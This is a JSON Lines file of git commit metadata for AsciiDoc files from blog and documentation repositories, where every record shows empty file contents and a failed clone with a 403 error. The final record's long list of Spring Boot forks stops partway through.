{"commit":"74a81ec3210bacadc3904b208c01eae642c3f222","subject":"Added Camel 2.17.6 release notes to docs","message":"Added Camel 2.17.6 release notes to docs\n","repos":"punkhorn\/camel-upstream,alvinkwekel\/camel,Fabryprog\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,nikhilvibhav\/camel,kevinearls\/camel,pax95\/camel,mcollovati\/camel,ullgren\/camel,objectiser\/camel,onders86\/camel,onders86\/camel,kevinearls\/camel,sverkera\/camel,Fabryprog\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,kevinearls\/camel,gnodet\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,CodeSmell\/camel,ullgren\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,cunningt\/camel,sverkera\/camel,nomoa\/camel,rhoml\/camel,jimczi\/camel,tadayosi\/camel,davidkarlsen\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,jamesnetherton\/camel,anoordover\/camel,tdiesler\/camel,pmoerenhout\/camel,onders86\/camel,anoordover\/camel,nicolaferraro\/camel,sverkera\/camel,Stacey-Gammon\/camel,apache\/camel,gnodet\/camel,CodeSmell\/camel,sverkera\/camel,pmoerenhout\/camel,mcollovati\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,objectiser\/camel,kevinearls\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,jamesnetherton\/camel,cunningt\/camel,jamesnetherton\/camel,jamesnetherton\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,anoordover\/camel,anoordover\/camel,DariusX\/camel,tadayosi\/camel,davidkarlsen\/camel,mcollovati\/camel,alvinkwekel\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,apache\/camel,nikhilvibhav\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2176-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2176-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"0a4b9a8a5ebc63aa757312305c32f871d52ab520","subject":"y2b create post Marshall Major Headphones Unboxing (White)","message":"y2b create post Marshall Major Headphones Unboxing (White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Marshall-Major-Headphones-Unboxing-White.adoc","new_file":"_posts\/2012-01-06-Marshall-Major-Headphones-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e4e53bc0a653a0629adfd89a852c1f50e3a72615","subject":"y2b create post The Pocket Washing Machine - Does It Suck?","message":"y2b create post The Pocket Washing Machine - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-03-The-Pocket-Washing-Machine--Does-It-Suck.adoc","new_file":"_posts\/2016-12-03-The-Pocket-Washing-Machine--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f26feb905880fdde5c433456c15e16aace8db910","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ca0ef75110ebea4611d9663c1492d5e2bb2eb4c0","subject":"CL note: more useful lib","message":"CL note: more useful lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
{"commit":"a14b8186044388faf35da916c648f7bbe5851113","subject":"Adds 2017-02-13-forge-3.5.1.final.asciidoc","message":"Adds 2017-02-13-forge-3.5.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-02-13-forge-3.5.1.final.asciidoc","new_file":"news\/2017-02-13-forge-3.5.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"ce93f572dca47e131fa3f3117423031a102c4352","subject":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","message":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6d7796ad2abefbfab9f74488dbcced43f8782c81","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1ff25d0d730a83bdf13c7dc09237f09aded35593","subject":"y2b create post How To Make Any Laptop Touch Screen!","message":"y2b create post How To Make Any Laptop Touch Screen!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-08-How-To-Make-Any-Laptop-Touch-Screen.adoc","new_file":"_posts\/2016-12-08-How-To-Make-Any-Laptop-Touch-Screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c35efaa256669ca5c58f2d308a8c6acdc6f758bd","subject":"Update 2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","message":"Update 2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","new_file":"_posts\/2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"59454869636b25319ae48d50067d49485543389f","subject":"added github friendly readme","message":"added github friendly readme\n","repos":"neo4j-attic\/yajsw,neo4j-attic\/yajsw","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-attic\/yajsw.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"}
{"commit":"232057225ec47e89122c5cc1df34026a4a870628","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"146f0e28e4d08542079861831e253ba5b2b25ea8","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"828c67a2c5d2fa479a9ddf43c5eddae0d04a65c7","subject":"Update 2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","message":"Update 2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","new_file":"_posts\/2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8a40f20e41814040b9a0ac62f8c815918a30b307","subject":"y2b create post Mass Effect 3 Collector's Edition Unboxing","message":"y2b create post Mass Effect 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-07-Mass-Effect-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-03-07-Mass-Effect-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0e226bb2ec3856e7f02bbc7f15ae59aa734d909f","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0706e361d94c8fb16a185b23d22b1aa83b753737","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"038fcab06837840cc562d37a6161715538bfe403","subject":"y2b create post Giveaway Winner \\u0026 New Giveaways!","message":"y2b create post Giveaway Winner \\u0026 New Giveaways!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-10-Giveaway-Winner-u0026-New-Giveaways.adoc","new_file":"_posts\/2011-12-10-Giveaway-Winner-u0026-New-Giveaways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b1e26e79f3a076d72350119e0cc63e55ccc9db85","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b97b492b76e03682934924555e02d572afc257b1","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1ca24617cec6c10d01f0bd82bd0dd266f59a26ec","subject":"Import release notes for Groovy 2.1","message":"Import release notes for Groovy 2.1\n","repos":"webkaz\/groovy-website,marcoVermeulen\/groovy-website,sdkman\/sdkman-website,m-ullrich\/groovy-website,kevintanhongann\/groovy-website,rahulsom\/sdkman-website,dmesu\/sdkman-website,benignbala\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,webkaz\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,marc0der\/groovy-website,marc0der\/groovy-website,PascalSchumacher\/groovy-website,benignbala\/groovy-website,sdkman\/sdkman-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.1.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"bc76219545547c0638aa90cfea0d9962c19154f9","subject":"Update 2019-06-25-The-Perfect-Man.adoc","message":"Update 2019-06-25-The-Perfect-Man.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-06-25-The-Perfect-Man.adoc","new_file":"_posts\/2019-06-25-The-Perfect-Man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"5b93631e7863db8929790bec958e3b2b57ca664f","subject":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","message":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4faab023f4ff1806c4dcd692c998fc1163082da8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"330073ed17ba0ec9ac46ab656607f5cedc6f7232","subject":"Fix broken link","message":"Fix broken link\n\nCloses gh-4243\n","repos":"shakuzen\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,wilkinsona\/spring-boot,pvorb\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,neo4j-contrib\/spring-boot,lexandro\/spring-boot,lburgazzoli\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,yhj630520\/spring-boot,zhanhb\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,herau\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,neo4j-contrib\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,michael-simons\/spring-boot,srikalyan\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,qerub\/spring-boot,yangdd1205\/spring-boot,izeye\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,hqrt\/jenkins2-course-spring-boot,kdvolder\/spring-boot,srikalyan\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,thomasdarimont\/spring-boot,sebastiankirsch\/spring-boot,RichardCSantana\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,rajanm\/elasticsearch... [list truncated at section boundary] ,yangdd1205\/spring-boot,philwebb\/spring-boot,srikalyan\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,rweisleder\/spring-boot,vpavic\/
spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,qerub\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,royclarkson\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,zhangshuangquan\/spring-root,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,lburgazzoli\/spring-boot,nebhale\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,hqrt\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,donhuvy\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,dfa1\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jvz\/spring-boot,izeye\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,linead\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,royclarkson\/spring-boot,srikalyan\/spring-boot,sebastiankirsch\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,hello2009chen\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,jbovet\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,sbuettner\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,aahlenst\/spring-boot,dfa1\/spring-boot,brettwooldridge\/spring-boot,vpavic\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,mrumpf\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,joansmith\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,ollie314\/spring-boot,lburgazzoli\/spring-boot,olivergierke\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,DeezCashews\/spring-boot,aahlenst\/spring-boot,mrumpf\/spring-boot,joshthornhill\/spring-boot,NetoDevel\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,eddumelendez\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,bbrouwer\/spring-boot,vakninr\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,joansmith\/spring-boot,scottfrederick\/spring-boot,thomasdarimont\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,ameraljovic\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,javyzheng\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,mosoft521\/spring-boot,RichardCSantana\/spring-boot,royclarkson\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,neo4j-contrib\/spring-boot,ameraljovic\/spring-boot,joansmith\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,herau\/spring-boot,deki\/spring-boot,eddumelendez\/spring-b
oot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,jayarampradhan\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,jvz\/spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,zhangshuangquan\/spring-root,jxblum\/spring-boot,htynkn\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,ameraljovic\/spring-boot,sbuettner\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,izeye\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,NetoDevel\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,bijukunjummen\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,hello2009chen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,sbuettner\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,mosoft521\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,srikalyan\/spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,bijukunjummen\/spring-boot,wilkinsona\/spring-boot,joansmith\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,sebastiankirsch\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,mrumpf\/spring-boot,tsachev\/spring-boot,lexandro\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,lucassaldanha\/spring-boot,sbuettner\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,herau\/spring-boot,ollie314\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,bclozel\/spring-boot,thomasdarimont\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,vakninr\/spring-boot,scottfrederick\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,philwebb\/spring-boot-concourse,Nowheresly\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,drumonii\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,ameraljovic\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,bclozel\/spring-boot,zhanhb\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,izeye\/spring-boot,hello2009chen\/spring-boot,akmaharshi\/jenkins,akmaharshi\/jenkins,philwebb\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,dfa1\/spring-boot,joshthornh
ill\/spring-boot,eddumelendez\/spring-boot,yhj630520\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,yangdd1205\/spring-boot,sebastiankirsch\/spring-boot,bbrouwer\/spring-boot,lenicliu\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,olivergierke\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,lenicliu\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,jmnarloch\/spring-boot,mrumpf\/spring-boot,jayarampradhan\/spring-boot,minmay\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,RichardCSantana\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,philwebb\/spring-boot,bijukunjummen\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,qerub\/spring-boot,linead\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,minmay\/spring-boot,joshthornhill\/spring-boot,shangyi0102\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,jbovet\/spring-boot,ollie314\/spring-boot,xiaoleiPENG\/my-project,candrews\/spring-boot,jvz\/spring-boot,sebastiankirsch\/spring-boot,minmay\/spring-boot,qerub\/spring-boot,eddumelendez\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,afroje-